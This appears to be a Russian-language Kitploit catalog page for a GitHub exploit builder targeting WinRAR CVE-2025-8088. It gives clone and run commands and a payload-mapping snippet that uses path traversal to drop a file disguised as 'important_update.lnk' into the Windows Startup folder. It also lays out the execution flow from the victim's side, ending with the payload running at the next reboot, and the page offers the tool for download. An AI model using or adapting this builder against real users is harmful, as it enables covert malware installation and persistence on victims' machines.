Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8088-WinRAR-builder — Эксплойт PoC для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже | Kitploit
Инструменты/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программРазработка Полезной Нагрузки
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Эксплойт PoC для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже

Репозиторий
1710 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8088-WinRAR-builder

POC-эксплойт для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже

🚀 Как это работает

  1. Создаёт RAR-архив со встроенными другими полезными нагрузками
  2. Использование нескольких ADS-потоков 🔄 — прикрепляет потоки полезных нагрузок с разной глубиной обхода пути
  3. Манипулирует заголовками RAR ⚙️ — изменяет структуру архива для эксплуатации уязвимости обхода пути
  4. Сбрасывает полезную нагрузку в автозагрузку 📂 — пытается записать полезную нагрузку в папку автозагрузки Windows при извлечении

🛠️ Использование

  1. Клонируйте репозиторий
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Подготовьте полезные нагрузки
root@kitploit:~
mkdir payloads
  • Добавьте свои полезные нагрузки в эту папку (exe, dll, lnk, ...)
  • Измените PAYLOAD_MAPPING в скрипте
root@kitploit:~
# 2. Сопоставьте свою полезную нагрузку с соответствующим местом назначения
#   Формат: (имя_файла_в_папке_payloads, целевой_путь_извлечения)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Полезная нагрузка 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Полезная нагрузка 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Полезная нагрузка 3
    # Добавьте свою собственную    
]
  1. Запустите эксплойт
root@kitploit:~
python builder.py <decoy_file>

🔄 Порядок выполнения

  1. Жертва извлекает RAR-архив с помощью уязвимой версии WinRAR (≤7.12)
  2. Полезная нагрузка записывается в целевую папку, например:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. При следующей перезагрузке ➡️ полезная нагрузка выполняется автоматически

📋 Требования

  • ОС Windows 🪟
  • Python 3.x 🐍
  • Установленный WinRAR
Скачать инструмент